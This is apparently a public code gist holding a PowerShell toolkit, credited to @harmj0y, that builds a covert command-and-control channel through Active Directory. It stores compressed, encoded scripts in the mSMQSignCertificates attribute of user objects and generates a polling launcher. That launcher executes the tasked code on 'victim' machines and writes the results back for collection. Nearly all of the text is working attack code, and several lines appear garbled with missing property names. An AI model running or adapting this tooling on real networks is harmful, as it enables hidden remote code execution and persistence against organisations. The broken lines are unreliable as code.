Last active December 21, 2024 07:23
Command and Control channel through Active Directory Object Properties
#Requires -Version 2
function New-ADPayload {
Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates
a one-line launcher.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Takes a script block or PowerShell .ps1 file, compresses the data using IO.Compression.DeflateStream,
and stores the resulting bytes as a base64-encoded string in the mSMQSignCertificates field of the
specified -TriggerAccount, defaulting to the current user. Also generates a one-line launcher that checks
for data in mSMQSignCertificates of the specified user on a timed interval, executing logic if it exists
and storing the results in mSMQSignCertificates for the current user.
.PARAMETER ScriptBlock
Script block to store in the mSMQSignCertificates field for the specified user.
Path of a PowerShell .ps1 script to store in the mSMQSignCertificates field for the specified user.
.PARAMETER TriggerAccount
The user account to store the compressed logic in, defaults to the current user ([Environment]::UserName).
Also accepts distinguishedname syntax (e.g. 'CN=harmj0y,CN=Users,DC=testlab,DC=local').
.PARAMETER SleepSeconds
The number of seconds to sleep between checks for the mSMQSignCertificates property, default
of 60 seconds.
PS C:\> New-ADPayload -Path C:\Temp\malicious.ps1
Store a malicious PowerShell script into the mSMQSignCertificates property for the current user and output
the launcher code in a custom object.
PS C:\> New-ADPayload -ScriptBlock {gci C:\} -Verbose
Store the specified scriptblock into the mSMQSignCertificates property for the current user and output
the launcher code in a custom object.
PS C:\> {gci C:\} | New-ADPayload
Store the specified scriptblock into the mSMQSignCertificates property for the current user and output
the launcher code in a custom object.
PS C:\> New-ADPayload -ScriptBlock {gci C:\Users\} -TriggerAccount mnelson -SleepSeconds 300 -Verbose
Store the specified scriptblock into the mSMQSignCertificates property for 'mnelson' user and output
the launcher code (utilizing a 5 minute sleep internval instead of 60 seconds) in a custom object.
[CmdletBinding(DefaultParameterSetName = 'ScriptBlock')]
Param (
[Parameter(ParameterSetName = 'ScriptBlock', Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
[Parameter(ParameterSetName = 'FilePath', Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[ValidateScript({Test-Path -Path $_ })]
[Alias('FilePath', 'FullName')]
[Parameter(Position = 1)]
$TriggerAccount = [Environment]::UserName,
[Parameter(Position = 2)]
$SleepSeconds = 60
# get the raw bytes for the logic to store
if($PSBoundParameters['Path']) {
try {
$Null = Get-ChildItem -Path $Path -ErrorAction Stop
$ScriptBytes = [IO.File]::ReadAllBytes((Resolve-Path -Path $Path))
catch {
throw "Error reading byte from file: $Path"
else {
$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($ScriptBlock)
# compress the data using DeflateStream
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
$CompressedScriptBytes = $CompressedStream.ToArray()
$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
$Searcher = [adsisearcher]''
if($TriggerAccount.Contains(',')) {
$Searcher.Filter = "(distinguishedname=$TriggerAccount)"
else {
$Searcher.Filter = "(samaccountname=$TriggerAccount)"
$Searcher.CacheResults = $False
$User = $Searcher.FindOne()
# grab the user object we're storing the trigger payload in
if($User) {
try {
$UserEntry = $User.GetDirectoryEntry()
$UserDN = $User.Properties.distinguishedname[0]
$Null = $UserEntry.Put('mSMQSignCertificates', $EncodedCompressedScript)
$Null = $UserEntry.SetInfo()
Write-Verbose "Payload stored in 'mSMQSignCertificates' parameter for $UserDN"
The expanded trigger logic:
sal a New-Object;
$OC=''; # original command
while($True) {
Start-Sleep $SleepSeconds;
# if there's a new tasking command
if($C -and ($C -ne '') -and ($C -ne $OC)){
# base64-decode/decompress the command and trigger it
$SB=([Text.Encoding]::ASCII).GetBytes($(iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($C),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd() | Out-String));
$CS=a IO.MemoryStream;
# compress/base64-encde the results
$DS=a IO.Compression.DeflateStream($CS,[IO.Compression.CompressionMode]::Compress);
$DS.Write($SB,0,$SB.Length);$DS.Dispose();$CS.Dispose();$R2 = [Convert]::ToBase64String($CS.ToArray());
# current user
# put the results in the current user's 'mSMQSignCertificates' field
$TriggerScript = "sal a New-Object;`$DC=([ADSI]'LDAP://RootDSE').dnshostname;`$OC='';while(`$True) {Start-Sleep $SleepSeconds;`$S=[adsisearcher][adsi]`"GC://`$DC`";`$S.Filter=`"(&(distinguishedname=$UserDN)(mSMQSignCertificates=*))`";`$S.CacheResults=`$False;`$U=`$S.FindOne();if(!`$u){continue};`$C=[System.Text.Encoding]::ASCII.GetString(`$[0]);if(`$C -and (`$C -ne '') -and (`$C -ne `$OC)){`$OC=`$C;`$SB=([Text.Encoding]::ASCII).GetBytes(`$(iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$C),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd() | Out-String));`$CS=a IO.MemoryStream;`$DS=a IO.Compression.DeflateStream(`$CS,[IO.Compression.CompressionMode]::Compress);`$DS.Write(`$SB,0,`$SB.Length);`$DS.Dispose();`$CS.Dispose();`$R2 = [Convert]::ToBase64String(`$CS.ToArray());`$CU=([adsisearcher]`"(samaccountname=`$([Environment]::UserName))`").FindOne().GetDirectoryEntry();`$CU.Put('mSMQSignCertificates',`$R2);`$CU.SetInfo();}}"
New-Object -TypeName PSObject -Property @{
TriggerAccount = $UserDN
EncodedPayload = $EncodedCompressedScript
TriggerScript = $TriggerScript
SleepSeconds = $SleepSeconds
catch {
Write-Error "Error setting mSMQSignCertificates for samaccountname: '$TriggerAccount' : $_"
else {
Write-Error "Error finding samaccountname '$TriggerAccount' : $_"
function Get-ADPayload {
Retrieves the script payload stored in the mSMQSignCertificates of the specified -TriggerAccount.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Retrieves the script payload stored in the mSMQSignCertificates of the specified -TriggerAccount,
base64-decodes and decompresses the logic, outputting everything as a custom PS object. For users in
a foreign domain, use "[email protected]" syntax.
.PARAMETER TriggerAccount
The user account to store the compressed logic in, defaults to the current user ([Environment]::UserName).
Also accepts distinguishedname syntax (e.g. 'CN=harmj0y,CN=Users,DC=testlab,DC=local').
PS C:\> Get-ADPayload
TriggerAccount Payload EncodedPayload
-------------- ------- --------------
CN=harmj0y,CN=Users,DC=tes... dir C:\ 7b0HYBxJliUmL23Ke39K9UrX4H...
PS C:\> Get-ADPayload -TriggerAccount mnelson
TriggerAccount Payload EncodedPayload
-------------- ------- --------------
CN=mnelson,CN=Users,DC=tes... dir C:\ 7b0HYBxJliUmL23Ke39K9UrX4H...
PS C:\> 'CN=harmj0y,CN=Users,DC=testlab,DC=local' | Get-ADPayload
TriggerAccount Payload EncodedPayload
-------------- ------- --------------
CN=harmj0y,CN=Users,DC=tes... dir C:\ 7b0HYBxJliUmL23Ke39K9UrX4H...
Param (
[Parameter(Position = 0, ValueFromPipeline = $True)]
$TriggerAccount = [Environment]::UserName
if($PSBoundParameters['TriggerAccount']) {
# get this machine's logon domain controller
$GlobalCatalog = ([ADSI]'LDAP://RootDSE').dnshostname
$Searcher = [adsisearcher][adsi]"GC://$GlobalCatalog"
Write-Verbose "Using the global catalog at GC://$($GlobalCatalog)"
else {
# if using the current user, just search the current domain
$Searcher = [adsisearcher]''
if($TriggerAccount.Contains(',')) {
$Searcher.Filter = "(distinguishedname=$TriggerAccount)"
else {
$Searcher.Filter = "(samaccountname=$TriggerAccount)"
$Searcher.CacheResults = $False
$User = $Searcher.FindOne()
if($User) {
try {
if($ {
$RawCommand = [System.Text.Encoding]::ASCII.GetString($[0])
$Payload = (New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($RawCommand),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
New-Object -TypeName PSObject -Property @{
TriggerAccount = $[0]
EncodedPayload = $RawCommand
Payload = $Payload
else {
Write-Verbose "No payload stored for $TriggerAccount"
catch {
Write-Error "Error retrieving mSMQSignCertificates for samaccountname '$TriggerAccount' : $_"
else {
Write-Error "Error finding samaccountname '$TriggerAccount' : $_"
function Remove-ADPayload {
Removes the script payload stored in the mSMQSignCertificates of the specified -TriggerAccount.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Removes the script payload stored in the mSMQSignCertificates of the specified -TriggerAccount.
.PARAMETER TriggerAccount
The user account to store the remove the trigger from, defaults to the current user ([Environment]::UserName).
Also accepts distinguishedname syntax (e.g. 'CN=harmj0y,CN=Users,DC=testlab,DC=local').
PS C:\> Remove-ADPayload
Removes the payload stored for the current user.
PS C:\> Remove-ADPayload -TriggerAccount mnelson
Removes the payload stored for the 'mnelson' user.
PS C:\> $Payload = Get-ADPayload
PS C:\> $Payload | Remove-ADPayload
Retrieve the AD payload for the current user and then remove it.
PS C:\> $Payload = {gci C:\} | New-ADPayload
PS C:\> $Payload | Remove-ADPayload
Create a new AD payload and then remove it.
Param (
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('cn', 'username')]
$TriggerAccount = [Environment]::UserName
$Searcher = [adsisearcher]''
if($TriggerAccount.Contains(',')) {
$Searcher.Filter = "(distinguishedname=$TriggerAccount)"
else {
$Searcher.Filter = "(samaccountname=$TriggerAccount)"
$Searcher.CacheResults = $False
$User = $Searcher.FindOne()
if($User) {
try {
$UserEntry = $User.GetDirectoryEntry()
# weird way to clear the entry
$UserEntry.PutEx(1, 'mSMQSignCertificates', 0)
Write-Verbose "Removed mSMQSignCertificates property for '$($[0])"
catch {
Write-Error "Error retrieving mSMQSignCertificates for samaccountname '$($[0])' : $_"
else {
Write-Error "Error finding samaccountname '$TriggerAccount' : $_"
function Get-ADPayloadResult {
Retrieves the results of any clients who executed the broadcast logic from New-ADPayload.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Queries all users EXCEPT the -TriggerAccount used to broadcast the script logic (default of [Environment]::UserName),
extracts out the compressed logic and displays the per-user results. If a -TriggerAccount value is specified,
the global catalog is searched for all results (instead of just the current domain)/
.PARAMETER TriggerAccount
The user account used to store the broadcast trigger, defaults to the current user.
Also accepts distinguishedname syntax (e.g. 'CN=harmj0y,CN=Users,DC=testlab,DC=local').
PS C:\> Get-ADPayloadResult | fl
TriggerAccount : harmj0y
Results :
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 7/13/2009 8:20 PM PerfLogs
d-r-- 8/9/2016 11:07 AM Program Files
d-r-- 7/13/2009 10:08 PM Program Files (x86)
d-r-- 8/12/2016 11:49 AM Users
d---- 8/9/2016 11:48 AM Windows
VictimAccount : CN=Justin Warner,CN=Users,DC=testlab,DC=local
Gathers results from all users (except the current user) with mSMQSignCertificates set.
PS C:\> Get-ADPayloadResult -Verbose -TriggerAccount harmj0y
VERBOSE: Using the global catalog at GC://PRIMARY.testlab.local
TriggerAccount Results VictimAccount
-------------- ------- -------------
harmj0y ... CN=Justin Warner,CN=Users,...
harmj0y ... CN=user1,CN=Users,DC=dev,D...
Gathers results from all users (except 'harmj0y') with mSMQSignCertificates set by searching the
global catalog.
Param (
[Parameter(ValueFromPipeline = $True)]
$TriggerAccount = [Environment]::UserName
if($PSBoundParameters['TriggerAccount']) {
# get this machine's logon domain controller
$GlobalCatalog = ([ADSI]'LDAP://RootDSE').dnshostname
$Searcher = [adsisearcher][adsi]"GC://$GlobalCatalog"
Write-Verbose "Using the global catalog at GC://$($GlobalCatalog)"
else {
# if using the current user, just search the current domain
$Searcher = [adsisearcher]''
if($TriggerAccount.Contains(',')) {
$Searcher.Filter = "(&(!distinguishedname=$TriggerAccount)(mSMQSignCertificates=*))"
else {
$Searcher.Filter = "(&(!samaccountname=$TriggerAccount)(mSMQSignCertificates=*))"
$Searcher.CacheResults = $False
ForEach($User in $Searcher.FindAll()) {
try {
$Raw = [System.Text.Encoding]::ASCII.GetString($[0])
$Results = (New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($([System.Text.Encoding]::ASCII.GetString($[0]))),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
New-Object -TypeName PSObject -Property @{
TriggerAccount = $TriggerAccount
VictimAccount = $[0]
Results = $Results
catch {
Write-Error "Error retrieving results from 'mSMQSignCertificates': $_"
Running the triggerscript..

myusername : The term 'myusername' is not recognized as the name of a cmdlet, function, script file, or operabl
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

